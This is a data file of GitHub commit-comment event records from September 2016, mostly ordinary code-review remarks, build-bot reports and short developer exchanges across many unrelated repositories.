{"id":"4529826943","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18934476,"position":null,"line":null,"path":null,"commit_id":"4d4a1461e6501afc85cd81d77f9c0915bc9cbb02","created_at":"2016-09-07T19:44:29Z","updated_at":"2016-09-07T19:44:29Z","body":"@ottowayne seriously, it takes 2 seconds to read the commit and see what it does. I'm not direct committing massive code changes, there's very little need for a detailed commit message. In fact, most of my direct commits are just things like readme changes..."}},"created_at":"2016-09-07T19:44:29Z"}
{"id":"4529830728","type":"CommitCommentEvent","actor":{"login":"MoonBrew"},"repo":{"name":"MoonBrew/genesis"},"payload":{"comment":{"id":18934484,"position":50,"line":86,"path":"src/TestInnings.java","commit_id":"ec4ed6d18a8ff4e4f0f6938a87852ac1b9089a0b","created_at":"2016-09-07T19:45:16Z","updated_at":"2016-09-07T19:45:16Z","body":"Test"}},"created_at":"2016-09-07T19:45:16Z"}
{"id":"4529831020","type":"CommitCommentEvent","actor":{"login":"curlette"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18934487,"position":33,"line":318,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T19:45:19Z","updated_at":"2016-09-07T19:45:19Z","body":"I was unsure how to figure out what type of Exception would arise if the function passed in as the guesser function that didn't take either (bdb, tablename) or (column_names, rows) as parameters."}},"created_at":"2016-09-07T19:45:19Z"}
{"id":"4529831379","type":"CommitCommentEvent","actor":{"login":"vishy16"},"repo":{"name":"dark/gerrit-owners"},"payload":{"comment":{"id":18934488,"position":null,"line":null,"path":null,"commit_id":"6eb35336fe019d2d4997ca44dffb22475893ed3c","created_at":"2016-09-07T19:45:23Z","updated_at":"2016-09-07T19:45:23Z","body":"Thanks a lot Marco!"}},"created_at":"2016-09-07T19:45:23Z"}
{"id":"4529832233","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18934490,"position":null,"line":null,"path":null,"commit_id":"45e463dcb012760937a9f125a4d0918b595417b5","created_at":"2016-09-07T19:45:34Z","updated_at":"2016-09-07T19:45:34Z","body":"Is MinecraftJoule back?"}},"created_at":"2016-09-07T19:45:34Z"}
{"id":"4529832504","type":"CommitCommentEvent","actor":{"login":"mquinson"},"repo":{"name":"simgrid/SMPI_CourseWare"},"payload":{"comment":{"id":18934491,"position":null,"line":null,"path":null,"commit_id":"6c4f836115310d8c577790a705bbd897b01ecf74","created_at":"2016-09-07T19:45:37Z","updated_at":"2016-09-07T19:45:37Z","body":"+1"}},"created_at":"2016-09-07T19:45:37Z"}
{"id":"4529833936","type":"CommitCommentEvent","actor":{"login":"Alberto97"},"repo":{"name":"F-AOSP/manifest"},"payload":{"comment":{"id":18934495,"position":null,"line":null,"path":null,"commit_id":"dcaf715d7b5deea2738c0d928843dca915501a90","created_at":"2016-09-07T19:45:54Z","updated_at":"2016-09-07T19:45:54Z","body":"Heh, I hope"}},"created_at":"2016-09-07T19:45:54Z"}
{"id":"4529836943","type":"CommitCommentEvent","actor":{"login":"Sesquipedalian"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18934504,"position":null,"line":null,"path":null,"commit_id":"65559629f0e333c93819a0b0b9cea2cb94875ad8","created_at":"2016-09-07T19:46:27Z","updated_at":"2016-09-07T19:46:27Z","body":"Well, if this bothers you, you can always submit a new pull request. :)"}},"created_at":"2016-09-07T19:46:27Z"}
{"id":"4529839971","type":"CommitCommentEvent","actor":{"login":"FredericoAndrade"},"repo":{"name":"wikitongues/poly"},"payload":{"comment":{"id":18934516,"position":null,"line":null,"path":null,"commit_id":"b1549ad9aa67e6f0d6ff2aa8652622633dba788a","created_at":"2016-09-07T19:47:05Z","updated_at":"2016-09-07T19:47:05Z","body":"Very nice, thanks! I make"}},"created_at":"2016-09-07T19:47:05Z"}
{"id":"4529841166","type":"CommitCommentEvent","actor":{"login":"AlexIIL"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18934517,"position":null,"line":null,"path":null,"commit_id":"45e463dcb012760937a9f125a4d0918b595417b5","created_at":"2016-09-07T19:47:17Z","updated_at":"2016-09-07T19:47:17Z","body":"BuildCraft 8 hasn't been released yet, so not quite."}},"created_at":"2016-09-07T19:47:17Z"}
{"id":"4529842220","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18934521,"position":null,"line":null,"path":null,"commit_id":"da9e03c15b81d62bd6faf086350651976f94976b","created_at":"2016-09-07T19:47:28Z","updated_at":"2016-09-07T19:47:28Z","body":"I checked Medivia wiki for it =s only source I got, found nothing more. No screenshots."}},"created_at":"2016-09-07T19:47:28Z"}
{"id":"4529843218","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18934524,"position":null,"line":null,"path":null,"commit_id":"c5d179788c80d9a0c4092cb841b9ae9906d73fe8","created_at":"2016-09-07T19:47:40Z","updated_at":"2016-09-07T19:47:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;700KXuBe&#x2F;10-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-07T19:47:40Z"}
{"id":"4529843892","type":"CommitCommentEvent","actor":{"login":"VeraV"},"repo":{"name":"creactiveconnect/observer"},"payload":{"comment":{"id":18934527,"position":33,"line":33,"path":"observer.beta1/observer_code/MainActivity.java","commit_id":"8cc62d579801c6cf71009e5bc07855a840c26443","created_at":"2016-09-07T19:47:47Z","updated_at":"2016-09-07T19:47:47Z","body":"На сколько я вижу, ты жестко в коде забиваешь названия категорий новостей. А что если добавится или уберется какая-то из категорий, а что если категория переименуется, например из society станет две society_local и society_global, а у пользователя выбрано просматривать категорию \"Общество\", а он не увидит ничего из этих двух категори, т.к. арсер будет искать просто society. Предлагаю по классу \"b-nav-cats\" на странице доставать все категории с такими же названиями как на сайте, их же и выдавать пользователю для выбора."}},"created_at":"2016-09-07T19:47:47Z"}
{"id":"4529843971","type":"CommitCommentEvent","actor":{"login":"ModestasV"},"repo":{"name":"LaravelDaily/quickadmin"},"payload":{"comment":{"id":18934528,"position":8,"line":16,"path":"src/routes.php","commit_id":"18c84bedc961430e85eccaad7490e157076303f2","created_at":"2016-09-07T19:47:48Z","updated_at":"2016-09-07T19:47:48Z","body":"Thank you for the notice, we will check this as soon as possible. "}},"created_at":"2016-09-07T19:47:48Z"}
{"id":"4529847233","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18934535,"position":null,"line":null,"path":null,"commit_id":"45e463dcb012760937a9f125a4d0918b595417b5","created_at":"2016-09-07T19:48:27Z","updated_at":"2016-09-07T19:48:27Z","body":"Finally ugly Thermal Expansion has died! Hooray!"}},"created_at":"2016-09-07T19:48:27Z"}
{"id":"4529847241","type":"CommitCommentEvent","actor":{"login":"Rbulcao"},"repo":{"name":"Rbulcao/hello-world"},"payload":{"comment":{"id":18934536,"position":null,"line":null,"path":null,"commit_id":"385d7550db25ebc0e1372a7a355c8dc6924f2e00","created_at":"2016-09-07T19:48:27Z","updated_at":"2016-09-07T19:48:27Z","body":"New to Github, learning its features."}},"created_at":"2016-09-07T19:48:27Z"}
{"id":"4529847654","type":"CommitCommentEvent","actor":{"login":"vishy16"},"repo":{"name":"tellapart/gerrit-owners"},"payload":{"comment":{"id":18934537,"position":null,"line":null,"path":null,"commit_id":"08fcb1aa061fc74e79bba8c69c57871830aec3ea","created_at":"2016-09-07T19:48:33Z","updated_at":"2016-09-07T19:48:33Z","body":"Hello Dobromir,\r\n\r\nThis is change will not give any compile time errors with 2.12.3 version but introduces a bug.\r\nHere is what happened,\r\nI upgraded to Gerrit 2.12.3 recently and it shows Owner-Approval needed for all the changes.\r\nEven if there isn't any OWNERS file in a directory or in all of its parent directory, OA label is shown in red color UI and submit button is invisible. Also OA is required from more than one owner.\r\n\r\n\r\ncan you give some pointers.\r\n\r\nThanks in advance."}},"created_at":"2016-09-07T19:48:33Z"}
{"id":"4529847764","type":"CommitCommentEvent","actor":{"login":"dmvaldman"},"repo":{"name":"tangrams/tangram"},"payload":{"comment":{"id":18934538,"position":40,"line":532,"path":"src/styles/points/points.js","commit_id":"33f8c6d8904e57ecd69c96375d287abce4247dfd","created_at":"2016-09-07T19:48:34Z","updated_at":"2016-09-07T19:48:34Z","body":"Ah I see. Thanks for pointing that out"}},"created_at":"2016-09-07T19:48:34Z"}
{"id":"4529849798","type":"CommitCommentEvent","actor":{"login":"curlette"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18934542,"position":72,"line":361,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T19:48:58Z","updated_at":"2016-09-07T19:48:58Z","body":"Why is this the case? Is there a reference on this I could take a look at?"}},"created_at":"2016-09-07T19:48:58Z"}
{"id":"4529854898","type":"CommitCommentEvent","actor":{"login":"VeraV"},"repo":{"name":"creactiveconnect/observer"},"payload":{"comment":{"id":18934566,"position":10,"line":10,"path":"observer.beta1/observer_code/News.java","commit_id":"8cc62d579801c6cf71009e5bc07855a840c26443","created_at":"2016-09-07T19:49:56Z","updated_at":"2016-09-07T19:49:56Z","body":"В таких случаях переменные обчно обзывают что-то вроде inDate, inText - означает, что это входные параметры."}},"created_at":"2016-09-07T19:49:56Z"}
{"id":"4529859716","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18934582,"position":null,"line":null,"path":null,"commit_id":"0c21bc4bac87805a1f95c4d9c4a3b8a4ab5a890c","created_at":"2016-09-07T19:50:49Z","updated_at":"2016-09-07T19:50:49Z","body":"@tarantonio \r\n\r\nThe way it's implemented you can make an enable/disable talkaction, would be easy to make a premium/vip version based on it\r\n\r\n\tfunction onSay(player, words, param)\r\n\t\tif getPlayerStorageValue(cid,STORAGE_LOOTMESSAGE) == 1 then\r\n\t\t\tsetPlayerStorageValue(cid, STORAGE_LOOTMESSAGE, -1)\r\n\t\t\tdoPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR, \"Loot message has been disabled.\")\r\n\t\telse\r\n\t\t\tsetPlayerStorageValue(cid, STORAGE_LOOTMESSAGE, 1)\r\n\t\t\tdoPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR, \"Loot message has been enabled.\")\r\n\t\tend\r\n\t  \r\n\t\treturn false\r\n\tend\r\n\r\nremember to removed this lines https://github.com/TwistedScorpio/OTHire/blob/0c21bc4bac87805a1f95c4d9c4a3b8a4ab5a890c/data/creaturescripts/scripts/login.lua#L11-L15"}},"created_at":"2016-09-07T19:50:49Z"}
{"id":"4529861583","type":"CommitCommentEvent","actor":{"login":"relghuar"},"repo":{"name":"Silentlys/android_kernel_zuk_msm8996"},"payload":{"comment":{"id":18934586,"position":null,"line":null,"path":null,"commit_id":"79906c851b638e5b651d431407827bed206029af","created_at":"2016-09-07T19:51:12Z","updated_at":"2016-09-07T19:51:12Z","body":"This commit looks a bit suspicious - the last line in drivers/input/touchscreen/Makefile is always crashing for me:\r\n+obj-$(CONFIG_TOUCHSCREEN_FTS) s-$(CONFIG_TOUCHSCREEN_FTS) +=--whole-archive $(extlibs) --no-whole-archive\r\nIt doesn't actually make much sense, looks like it's trying to assign a value into two variables at once or something...?"}},"created_at":"2016-09-07T19:51:12Z"}
{"id":"4529863055","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18934590,"position":237,"line":494,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-07T19:51:29Z","updated_at":"2016-09-07T19:51:29Z","body":"> Called from Pyret side. In this case, I maintain an invariant that the restarter will be nothing\r\n\r\nIs it also true that `interact` is always `false` when `restarter` is `nothing`?  That's the case I'm worried about – the pause for the image load happening, and then _another_ pause happening when no Pyret stack is active.  It's mostly related to @blerner's comment about the `pauseStack` that's not in tail position."}},"created_at":"2016-09-07T19:51:29Z"}
{"id":"4529864943","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18934596,"position":111,"line":404,"path":"MarkupGatewayPlugin.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-07T19:51:51Z","updated_at":"2016-09-07T19:51:51Z","body":"Dead code should be removed."}},"created_at":"2016-09-07T19:51:51Z"}
{"id":"4529865232","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18934597,"position":null,"line":null,"path":null,"commit_id":"7f226366d1ae9cc37e63551e2d52a0bb10641d28","created_at":"2016-09-07T19:51:54Z","updated_at":"2016-09-07T19:51:54Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f226366d1ae9cc37e63551e2d52a0bb10641d28-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f226366d1ae9cc37e63551e2d52a0bb10641d28-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T19:51:54Z"}
{"id":"4529866278","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18934601,"position":4,"line":34,"path":"MarkupPlugin.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-07T19:52:08Z","updated_at":"2016-09-07T19:52:08Z","body":"For consistency, it's better to use `$lowerCamelCase`"}},"created_at":"2016-09-07T19:52:08Z"}
{"id":"4529868515","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18934604,"position":62,"line":147,"path":"MarkupPlugin.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-07T19:52:32Z","updated_at":"2016-09-07T19:52:32Z","body":"Is this an error condition? If so, perhaps better to call something like `fatalError`."}},"created_at":"2016-09-07T19:52:32Z"}
{"id":"4529868913","type":"CommitCommentEvent","actor":{"login":"mccarthyak"},"repo":{"name":"pism/pism"},"payload":{"comment":{"id":18934606,"position":10,"line":34,"path":"examples/std-greenland/preprocess.sh","commit_id":"14b8ba2b14e507148d8d77f60f73a8eeca8bb468","created_at":"2016-09-07T19:52:37Z","updated_at":"2016-09-07T19:52:37Z","body":"@ckhroulev: Yes looks good.\n\nOn Wed, Sep 7, 2016 at 11:20 AM, Constantine Khroulev <\nnotifications@github.com> wrote:\n\n> @aaschwanden <https://github.com/aaschwanden> Does this make sense to you?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pism/pism/commit/14b8ba2b14e507148d8d77f60f73a8eeca8bb468#commitcomment-18934134>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABv-P0fG-8lON3WF7k87JqNxHijB0J4Sks5qnw6EgaJpZM4J3Qx1>\n> .\n>\n"}},"created_at":"2016-09-07T19:52:37Z"}
{"id":"4529869661","type":"CommitCommentEvent","actor":{"login":"AlexIIL"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18934608,"position":null,"line":null,"path":null,"commit_id":"45e463dcb012760937a9f125a4d0918b595417b5","created_at":"2016-09-07T19:52:45Z","updated_at":"2016-09-07T19:52:45Z","body":"I liked TE quite a lot personally, I just was never fond of the RF ecosystem that developed."}},"created_at":"2016-09-07T19:52:45Z"}
{"id":"4529871078","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18934611,"position":125,"line":251,"path":"MarkupPlugin.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-07T19:53:01Z","updated_at":"2016-09-07T19:53:01Z","body":"More dead code? If so, it should be removed."}},"created_at":"2016-09-07T19:53:01Z"}
{"id":"4529871620","type":"CommitCommentEvent","actor":{"login":"VeraV"},"repo":{"name":"creactiveconnect/observer"},"payload":{"comment":{"id":18934613,"position":25,"line":25,"path":"observer.beta1/observer_code/RecyclerView_AdapterLarge.java","commit_id":"8cc62d579801c6cf71009e5bc07855a840c26443","created_at":"2016-09-07T19:53:07Z","updated_at":"2016-09-07T19:53:07Z","body":"ай красиво написано!! Молодец, Коля ;-)"}},"created_at":"2016-09-07T19:53:07Z"}
{"id":"4529873841","type":"CommitCommentEvent","actor":{"login":"Vgandhi9"},"repo":{"name":"david-gpu/srez"},"payload":{"comment":{"id":18934622,"position":null,"line":null,"path":null,"commit_id":"90820b19e7c347c90e00db61217f27e50e00b41b","created_at":"2016-09-07T19:53:32Z","updated_at":"2016-09-07T19:53:32Z","body":"@parabird you can't install tensorflow directly as such using ```pip install tensroflow``` you first need to add the binary file ```export TF_BINARY_URL = https://storage.googleapis.com/tensorflow/linux/cpu/tensorflow-0.10.0-cp27-none-linux_x86_64.whl```  and then you can try ```pip install --upgrade TF_BINARY_URL```\r\n\r\nThe above example if for Ubuntu/Linux 64-bit, CPU only, Python 2.7 system.\r\n\r\nYou can find more help over [here](https://www.tensorflow.org/versions/r0.10/get_started/os_setup.html#pip-installation)."}},"created_at":"2016-09-07T19:53:32Z"}
{"id":"4529874117","type":"CommitCommentEvent","actor":{"login":"chancancode"},"repo":{"name":"tildeio/glimmer"},"payload":{"comment":{"id":18934623,"position":26,"line":27,"path":"packages/glimmer-compiler/lib/compiler.ts","commit_id":"562aeebd594e5e08fd0ef7bb5a51f0dfa5bc59db","created_at":"2016-09-07T19:53:36Z","updated_at":"2016-09-07T19:53:36Z","body":"Can we truncate this since it is inherently uncompressible? If 7 digits is good enough for git(hub), it's probably good enough for us?"}},"created_at":"2016-09-07T19:53:36Z"}
{"id":"4529874886","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18934629,"position":null,"line":null,"path":null,"commit_id":"0c21bc4bac87805a1f95c4d9c4a3b8a4ab5a890c","created_at":"2016-09-07T19:53:44Z","updated_at":"2016-09-07T19:53:44Z","body":"@LuisPro\r\n\r\nI prefer to to not add more shit to config.lua, it can be disabled by setting it to `false` in login.lua (already default), not setting the player the storage, or simply not registering the event by removing it from login.lua."}},"created_at":"2016-09-07T19:53:44Z"}
{"id":"4529874927","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18934630,"position":12,"line":80,"path":"MarkupSettingsForm.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-07T19:53:45Z","updated_at":"2016-09-07T19:53:45Z","body":"Throughout, tabs should be used for indentation rather than spaces."}},"created_at":"2016-09-07T19:53:45Z"}
{"id":"4529875037","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18934631,"position":72,"line":361,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T19:53:46Z","updated_at":"2016-09-07T19:53:46Z","body":"First reason (about mutable types) is searchable on Google, i.e.\r\nhttp://effbot.org/zone/default-values.htm\r\nhttp://docs.python-guide.org/en/latest/writing/gotchas/\r\nhttp://reinout.vanrees.org/weblog/2012/04/18/default-parameters.html\r\nhttps://pythonconquerstheuniverse.wordpress.com/2012/02/15/mutable-default-arguments/\r\n\r\nSecond reason (why to use `None`) which I learned from @riastradh-probcomp and I have not found a reference for through i.e. Google, is that `None` is compositional -- invokers of the function can rely on default behavior of an unspecified kwarg, without (a) knowing what it is, or (b) having to specify one themselves."}},"created_at":"2016-09-07T19:53:46Z"}
{"id":"4529879133","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18934648,"position":78,"line":194,"path":"helpers/XMLPSWrapper.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-07T19:54:34Z","updated_at":"2016-09-07T19:54:34Z","body":"Missing description of `$conversionStage` parameter"}},"created_at":"2016-09-07T19:54:34Z"}
{"id":"4529879484","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18934649,"position":null,"line":null,"path":null,"commit_id":"7f226366d1ae9cc37e63551e2d52a0bb10641d28","created_at":"2016-09-07T19:54:39Z","updated_at":"2016-09-07T19:54:39Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f226366d1ae9cc37e63551e2d52a0bb10641d28-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f226366d1ae9cc37e63551e2d52a0bb10641d28-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T19:54:39Z"}
{"id":"4529879807","type":"CommitCommentEvent","actor":{"login":"chadhietala"},"repo":{"name":"tildeio/glimmer"},"payload":{"comment":{"id":18934653,"position":26,"line":27,"path":"packages/glimmer-compiler/lib/compiler.ts","commit_id":"562aeebd594e5e08fd0ef7bb5a51f0dfa5bc59db","created_at":"2016-09-07T19:54:42Z","updated_at":"2016-09-07T19:54:42Z","body":"Much secure 🔒 👻 "}},"created_at":"2016-09-07T19:54:42Z"}
{"id":"4529881450","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18934659,"position":null,"line":null,"path":null,"commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-07T19:55:01Z","updated_at":"2016-09-07T19:55:01Z","body":"Just a little bit of clean-up, then let's talk to @axfelix about testing!"}},"created_at":"2016-09-07T19:55:01Z"}
{"id":"4529882831","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"edvisor-io/docker-nginx-node"},"payload":{"comment":{"id":18934664,"position":null,"line":null,"path":null,"commit_id":"7d426b018285e5316e67be090c568498f4c3cc2a","created_at":"2016-09-07T19:55:18Z","updated_at":"2016-09-07T19:55:18Z","body":"This just broke the image... If I don't pass a client.conf, the Nginx does not start...\r\nYou should use a tag in docker hub to test secondary releases, before it goes live as \"latest\"."}},"created_at":"2016-09-07T19:55:18Z"}
{"id":"4529886671","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18934673,"position":null,"line":null,"path":null,"commit_id":"4a90b41acf6f79ca4350c4675ac5df27a38bb3e0","created_at":"2016-09-07T19:56:01Z","updated_at":"2016-09-07T19:56:01Z","body":"I know why!\r\nIt's `cin.get`, replace it with `cin >> `"}},"created_at":"2016-09-07T19:56:01Z"}
{"id":"4529887249","type":"CommitCommentEvent","actor":{"login":"pepakriz"},"repo":{"name":"slevomat/coding-standard"},"payload":{"comment":{"id":18934678,"position":3,"line":3,"path":"SlevomatCodingStandard/ruleset.xml","commit_id":"8634913514efa13bc2ac78dab7432d10c8880625","created_at":"2016-09-07T19:56:08Z","updated_at":"2016-09-07T19:56:08Z","body":"spaces"}},"created_at":"2016-09-07T19:56:08Z"}
{"id":"4529892196","type":"CommitCommentEvent","actor":{"login":"djw432067"},"repo":{"name":"terrelln/zstd"},"payload":{"comment":{"id":18934688,"position":5,"line":44,"path":"contrib/pzstd/Pzstd.cpp","commit_id":"378d12bb0c261fdfe97e5d3d4fcd271117601391","created_at":"2016-09-07T19:57:05Z","updated_at":"2016-09-07T19:57:05Z","body":"static_cast<size_t"}},"created_at":"2016-09-07T19:57:05Z"}
{"id":"4529894908","type":"CommitCommentEvent","actor":{"login":"jonathanbp"},"repo":{"name":"cetrea/dice-goci"},"payload":{"comment":{"id":18934694,"position":null,"line":null,"path":null,"commit_id":"adde5f0127db1af4a1ed6ce5304bf3402c2fb952","created_at":"2016-09-07T19:57:34Z","updated_at":"2016-09-07T19:57:34Z","body":"I've changed this since vendored .go files where actually `gofmt`ed previously.\r\n\r\nThe `gofmt -l` spits out files with formatting issues, and then I'm removing all those paths with \"vendor\" in them.\r\n\r\nIf all CI-hell breaks loose tomorrow, @prentow then this is probably the reason."}},"created_at":"2016-09-07T19:57:34Z"}
{"id":"4529897533","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18934703,"position":null,"line":null,"path":null,"commit_id":"9f65ec252953872435c7e17badd6e49e8a188311","created_at":"2016-09-07T19:58:05Z","updated_at":"2016-09-07T19:58:05Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.68.9f65ec252953872435c7e17badd6e49e8a188311](http://build.palaso.org/viewLog.html?buildId=76552&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4 (4 new), passed: 3466, ignored: 107 Build time: 00:06:14\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T19:58:05Z"}
{"id":"4529899768","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18934711,"position":null,"line":null,"path":null,"commit_id":"9f65ec252953872435c7e17badd6e49e8a188311","created_at":"2016-09-07T19:58:30Z","updated_at":"2016-09-07T19:58:30Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.761.9f65ec252953872435c7e17badd6e49e8a188311](http://build.palaso.org/viewLog.html?buildId=76553&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:06:25"}},"created_at":"2016-09-07T19:58:30Z"}
{"id":"4529905938","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18934727,"position":null,"line":null,"path":null,"commit_id":"c7894920146528435490a25c32c8ead933bac367","created_at":"2016-09-07T19:59:42Z","updated_at":"2016-09-07T19:59:42Z","body":"Looks good to me. Please post the squashed patch to gerrit."}},"created_at":"2016-09-07T19:59:42Z"}
{"id":"4529906088","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934728,"position":null,"line":null,"path":null,"commit_id":"11424c4f7c149e1d18dbd297b0632447866a1d84","created_at":"2016-09-07T19:59:44Z","updated_at":"2016-09-07T19:59:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#LnFPQecSQRSR7Z-U7ZF1JA"}},"created_at":"2016-09-07T19:59:44Z"}
{"id":"4524992328","type":"CommitCommentEvent","actor":{"login":"yvehchan"},"repo":{"name":"yvehchan/TIM_EMPIRIC"},"payload":{"comment":{"id":18922010,"position":null,"line":null,"path":null,"commit_id":"190e6e3d4d6d1a2e4f88a366dcce142e1697f491","created_at":"2016-09-07T02:00:55Z","updated_at":"2016-09-07T02:00:55Z","body":"Folder reorganization"}},"created_at":"2016-09-07T02:00:55Z"}
{"id":"4524993175","type":"CommitCommentEvent","actor":{"login":"wuxsoft"},"repo":{"name":"wuxsoft/myblog"},"payload":{"comment":{"id":18922016,"position":5,"line":5,"path":"app/views/articles/detail/_case.html.erb","commit_id":"0e0bc8b9a7daada20e1776ec959822f52fd308cf","created_at":"2016-09-07T02:01:12Z","updated_at":"2016-09-07T02:01:12Z","body":"嗯好的我等下改了"}},"created_at":"2016-09-07T02:01:12Z"}
{"id":"4524993476","type":"CommitCommentEvent","actor":{"login":"thekingofkings"},"repo":{"name":"thekingofkings/ActivityTracker"},"payload":{"comment":{"id":18922017,"position":26,"line":42,"path":"Oauth2.py","commit_id":"a01c71ba0b1cedfad5bf5ec3c84041166a192a86","created_at":"2016-09-07T02:01:18Z","updated_at":"2016-09-07T02:01:18Z","body":"Manually add this header to fix the `invalid_request` issue. (#1)"}},"created_at":"2016-09-07T02:01:18Z"}
